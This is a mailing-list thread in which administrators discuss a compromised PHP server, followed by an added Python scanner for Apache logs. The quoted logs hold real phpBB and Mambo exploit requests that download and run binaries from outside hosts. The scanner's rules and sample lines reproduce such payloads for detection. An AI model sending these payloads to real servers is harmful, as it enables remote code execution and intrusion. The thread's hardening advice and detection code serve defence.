I would personally set up mod_security as well. It should stop most of these types of attacks right away with default settings.
Peter
On 2/10/06, David <[EMAIL PROTECTED]> wrote:
Bill Shupp wrote:
> David wrote:
>
>> Thanks Peter - reassuring to know that someone else thinks they probably
>> didn't get root... I have been watching ps and netstat -p and haven't
>> seen anything suspicious, nor seen any more rogue messages in my mail
>> queue... fingers crossed :) I have plans to replace this box ASAP however.
>>
>> I uncovered this in the apache logs:
>>
>> ./www.myvirtualhost.domain-access_log:86.35.6.242 - -
>> [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2&rush=%
>> 65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20www.cycomm.info/priv8/bin.tar.gz;tar%20xzvf%20bin.tar.gz;bin/bsh;ls%20-sa%
>>
>> 3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%7
>>
>> 3%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0 (compatible; MSIE
>> 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
>>
>> Looks bad, a phpbb exploit perhaps, but the date is wrong... hoping the
>> system weathered that one. Closer to date is:
>>
>> ./myvirtualhost.domain-error_log:[Sun Jan 15 22:51:53 2006] [error]
>> [client 85.214.20.161] request failed: erroneous characters aft
>> er protocol string: GET
>> /php/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http:
>>
>> //209.136.48.69/cmd.gif?&cmd=cd%20/tmp;wget%20209.136.48.69/micu;chmod%20744%20micu;./micu;echo%20YYY;echo|
>> HTTP\\x01.1
>>
>> But it looks like that one failed. Oh well time to update php and clean
>> out a few old phpbb installs. Thanks all for your help.
>>
>> David
>>
>
>
> A few things I always run into with PHP that are popular:
>
> 1) Make sure PHPBB is the latest version and not exploitable. I used to
> allow my clients to install it, but every few months, SOMEONE would
> install an old exploitable version. I've switched to using debian's
> PHPBB package, and just point clients to it so I don't have to keep
> track of it anymore. I just run security updates daily instead on all
> packages. Haven't been exploited since.
>
> 2) Keep register_globals off, and only turn it on as needed.
>
> 3) Make sure allow_url_fopen is set to OFF. This is a very popular one,
> and in my experience tends to attract DDoS attacks rather than a mail
> exploit. But costs you expensive bandwidth nonetheless.
>
> Regards,
>
> Bill
>
Cheers Bill, register_globals always off, but now I will probably
disable url file operations too. Perhaps just enable them on a per-site
setting
David
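As an added example (not code from the thread), a small Python scanner for Apache access logs that decodes request URLs, including double-encoded parameters such as %2527, and flags the three patterns visible in David's logs: calls to PHP execution functions, remote-file-include URLs passed in query parameters, and shell command chains. The log lines, client addresses and download hosts are constructed.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-log lines modelled on the two requests quoted in
# the thread; hosts are documentation addresses, not the original ones.
SAMPLE_LINES = [
    '192.0.2.10 - - [25/Jul/2005:21:32:12 +0930] "GET /store/phpbb2/viewtopic.php?t=2'
    '&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20203.0.113.9/bin.tar.gz'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53'
    '%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 21138 "-" "Mozilla/4.0"',
    '192.0.2.11 - - [15/Jan/2006:22:51:53 +1030] "GET /php/mambo/index2.php?_REQUEST[option]'
    '=com_content&mosConfig_absolute_path=http://203.0.113.9/cmd.gif?&cmd=cd%20/tmp;'
    'wget%20203.0.113.9/micu HTTP/1.1" 400 0 "-" "-"',
    '192.0.2.12 - - [15/Jan/2006:23:00:00 +1030] "GET /store/phpbb2/viewtopic.php?t=2'
    '&highlight=apache HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def fully_decode(s, rounds=3):
    """Percent-decode until stable: %2527 -> %27 -> ' (double encoding evades naive filters)."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s

RULES = [
    ("php_exec_function", re.compile(r'\b(passthru|system|shell_exec|exec|popen)\s*\(', re.I)),
    ("remote_file_include", re.compile(r'[?&][^=&]+=(https?|ftp)://', re.I)),
    ("shell_command_chain", re.compile(r'(;|\|)\s*(cd|wget|curl|chmod|perl|sh)\b', re.I)),
]

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for a clean/unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m.group("target"))
    rules = [name for name, rx in RULES if rx.search(decoded)]
    if not rules:
        return None
    return {"client": m.group("client"), "status": int(m.group("status")),
            "path": decoded.split("?", 1)[0], "rules": rules}

def scan(lines):
    return [hit for hit in map(analyze_line, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit)
```

A 200 on a flagged phpBB request (as in the first quoted entry) deserves the closer look David gave his process list; a 4xx (as in the Mambo entry) means the request never reached PHP.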
